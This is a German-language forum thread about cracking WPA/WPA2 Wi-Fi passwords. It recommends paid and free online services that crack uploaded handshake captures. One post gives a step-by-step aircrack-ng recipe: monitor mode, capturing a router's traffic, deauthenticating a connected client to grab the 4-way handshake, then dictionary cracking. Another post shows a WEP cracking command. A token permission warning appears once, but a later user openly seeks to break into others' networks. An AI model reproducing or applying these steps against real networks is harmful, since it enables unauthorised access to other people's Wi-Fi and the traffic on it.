|
|
|
10.12.09, 14:44
|
#1
|
Banned
Registriert seit: May 2009
Beiträge: 296
Bedankt: 89
|
[Tip] WPA/WPA2 Cracker
Hey!
Wollte euch mal einen kleinen Tip geben, falls ihr vergeblich versucht, das Passwort eines mit WPA/WPA2 verschlüsselten WLAN´s zu cracken, oder zu wenig Zeit und Rechenleistung habt, um es zu bruteforcen.
Alles was ihr braucht ist das Capture File (pcap) des Routers, inkl. 4-Way Handshake.
Auf [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] könnt ihr dann für 17 Dollar veruschen, dass Passwort knacken zu lassen.
Dazu wird ein 400 CPU Cluster verwendet, der in einem 120 Millionen-Wörter starken Wörterbuch nach dem Passwort sucht, und das in nur 20 Minuten.
Alternativ kann man das auch kostenlos auf [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] probieren, allerdings sind die ESSID´s vorgegeben, und enthällt fast nur englische Modelle.
MFG Bratwurstwetter
|
|
|
Folgendes Mitglied bedankte sich bei Bratwurstwetter:
|
|
10.12.09, 14:52
|
#2
|
DGT Supporter
Registriert seit: Feb 2009
Beiträge: 72
Bedankt: 235
|
Zitat:
Alles was ihr braucht ist das Capture File (pcap) des Routers, inkl. 4-Way Handshake.
|
Hmm.. wie mach ich das?
mfg
|
|
|
10.12.09, 15:00
|
#3
|
xor eax, eax
Registriert seit: Sep 2009
Beiträge: 596
Bedankt: 466
|
Zitat:
Zitat von StOn€_9
Hmm.. wie mach ich das?
mfg
|
[ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
Viel Spaß damit und nicht vergessen - nicht an WLANs anweden, welche einem nicht gehören oder man nicht die ausdrückliche Erlaubnis zum Pen-Testen des fremden Netzes hat.
__________________
Desktop: Arch Linux | Laptop: Arch Linux
VM: Windows 7, Windows XP, Fedora 14, Arch, Windows Server 2008 R2 Enterprise
|
|
|
11.12.09, 12:24
|
#4
|
...
Registriert seit: Nov 2009
Beiträge: 23
Bedankt: 334
|
Zitat:
Zitat von Bratwurstwetter
Hey!
Wollte euch mal einen kleinen Tip geben, falls ihr vergeblich versucht, das Passwort eines mit WPA/WPA2 verschlüsselten WLAN´s zu cracken, oder zu wenig Zeit und Rechenleistung habt, um es zu bruteforcen.
Alles was ihr braucht ist das Capture File (pcap) des Routers, inkl. 4-Way Handshake.
Auf [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] könnt ihr dann für 17 Dollar veruschen, dass Passwort knacken zu lassen.
Dazu wird ein 400 CPU Cluster verwendet, der in einem 120 Millionen-Wörter starken Wörterbuch nach dem Passwort sucht, und das in nur 20 Minuten.
Alternativ kann man das auch kostenlos auf [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] probieren, allerdings sind die ESSID´s vorgegeben, und enthällt fast nur englische Modelle.
MFG Bratwurstwetter
|
hast du die schon selber ausprobiert ???
|
|
|
11.12.09, 13:17
|
#5
|
Banned
Registriert seit: May 2009
Beiträge: 296
Bedankt: 89
|
Ja, hab mir das 2 mal gegönnt, und die aufgezeichnete pcap Datei meines WPA2 Routers dort knacken lassen. Hat auch wunderbar funktioniert. Nach ner halben Stunde hatte ich ne Mail mit dem Passwort.
Zuerst ein sehr leichtes, danach nur eins aus Zahlen. Beide wurden in deren Wörterbuch gefunden.
Aber eins muss dir klar sein, wenn jem. sein WPA2 Passwort "HHDjdi39§("(§0ß290u2E" gesetzt hat, ist die Warscheinlichkeit sehr gering, dass dieses PW im Wörterbuch zu finden ist...
Und das Geld bekommst du dann auch nicht wieder.
Da meiner Erfahrung nach aber die meisten einfache Wörter als Passwörter benutzen, lohnt es sich allemal!
Gruß!
|
|
|
11.12.09, 13:30
|
#6
|
Banned
Registriert seit: May 2009
Beiträge: 296
Bedankt: 89
|
Und zu deiner PM, wo man die Capture Datei findet und für was man die braucht:
(Ich veröffentliche deine Frage einafch mal, damit andere auch was von haben, unwissenheit ist ja nichts schlimmes )
Ich geh nochmal die Schritte schnell durch...
airmon-ng stop ath0 (löscht moni mode)
airmon-ng start wifi0 (start moni mode auf ath0)
airodump-ng –w ath1 (nach AP´s mit Client suchen, alles merken)
airodump-ng –w CAPDATEI –c CHANNEL --bssid ROUTERNAME ath1 (-w ist write, schreibt also in die Cap Datei, channel des Routers, bssid name des routers, wenn leerzeichen hat, mit hochstrich einklammern, sprich 'Speedport W500 V' )
aireplay-ng -0 1 -a ROUTERMAC –c VERBUNDENERCLIENTMAC ath1 (den client disconnecten, um den handshake in die cap datei zu schreiben)
In Airodump sollte oben rechts jetzt Handshake stehen, sprich der Handshake wurde in die Cap Datei gespeichert...
Wenn du ein eigenes Wörterbuch hast, kannst du versuchen, es selbst zu knacken..
aircrack-ng -0 –x2 -w WÖRTERBUCH.txt FILE.cap
Die Cap Datei sollte in deinem Root Verzeichnis sein, diese kannst du dann auf den besagten Seiten hochladen.
Wenn du Englisch kannst, solltest du dir das [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] ansehen...
Viel Erfolg!
MFG Bratwurstwetter...
BTW mein 100. Post
|
|
|
Folgendes Mitglied bedankte sich bei Bratwurstwetter:
|
|
11.12.09, 16:31
|
#7
|
~Shisha-Chiller~
Registriert seit: Jul 2009
Ort: C:\Windows\System32\explorer.exe
Beiträge: 119
Bedankt: 107
|
@Bratwurstwetter:
bei deiner anleitung hätt ich eine anmerkung:
Der Handshake ensteht nicht, wenn man den Client disconnected, sondern erst, wenn dieser sich wieder anmeldet^^
__________________
"Oh, ein sprechender Elch will meine Kreditkartennummer... das find ich ein faires Angebot!"
|
|
|
11.12.09, 18:26
|
#8
|
...
Registriert seit: Nov 2009
Beiträge: 23
Bedankt: 334
|
danke
pcap = .cap datei hätte ich wissen müssen .
|
|
|
17.12.09, 22:12
|
#9
|
...
Registriert seit: Nov 2009
Beiträge: 23
Bedankt: 334
|
hast du vieleicht eine ahnung wieso bleibt mein pc bei eine life-cd
immer hängen wenn ich der befehl
aircrack-ng -b 00:09:5B 9:96:1C filename-01.cap
eingebe ???
wep hack .
|
|
|
09.06.10, 18:35
|
#10
|
Anfänger
Registriert seit: Feb 2010
Beiträge: 1
Bedankt: 1
|
Wie soll denn dein Rechner au eine CD schreiben können. Geht nicht im Live-CD Modus
|
|
|
09.06.10, 20:21
|
#11
|
Echter Freak
Registriert seit: Mar 2010
Ort: /home/spartan-b292
Beiträge: 2.856
Bedankt: 1.700
|
Zitat:
Aber eins muss dir klar sein, wenn jem. sein WPA2 Passwort "HHDjdi39§("(§0ß290u2E" gesetzt hat, ist die Warscheinlichkeit sehr gering, dass dieses PW im Wörterbuch zu finden ist...
|
Das stimmt, wird aber das Passwort mit Rainbowtables "geknackt" sieht die Sache schon wieder anderst aus..vorrausgesetzt die Rechnpower ist hoch und die Tabellen gut genug.
__________________
"They who can give up essential liberty to obtain a little temporary safety, deserve neither liberty nor safety"
|
|
|
Folgendes Mitglied bedankte sich bei spartan-b292:
|
|
18.05.11, 10:33
|
#12
|
Anfänger
Registriert seit: Oct 2009
Beiträge: 1
Bedankt: 0
|
hätte da mal ne fragen zu demm ganzen WPA2 kramm hier habe davon so gut we kene ahnung aber wollte mal fragen obs nen prog gbt das mich das manuel hecken läst ohen € oder $ latzen zu müssen klar werd dich dann woll gegen nen paar § und absätze verstossen aebr das ja nix neues bei so vielen menschen auf der Welt die sich schlimmeren vergehen hingeben...... Also wäre es mir öglich mit nem freeload Prog. nen hacker zu finden mit dehm ich die wlan WPa 2 verschlüsselung kancken kann ohne irgendwas zu haben wie zb Router Ip oder son zeug?
mfg
SilvaOne
|
|
|
Themen-Optionen |
|
Ansicht |
Linear-Darstellung
|
Forumregeln
|
Du kannst keine neue Themen eröffnen
Du kannst keine Antworten verfassen
Du kannst keine Anhänge posten
Du kannst nicht deine Beiträge editieren
HTML-Code ist Aus.
|
|
|
Alle Zeitangaben in WEZ +1. Es ist jetzt 13:58 Uhr.
().
|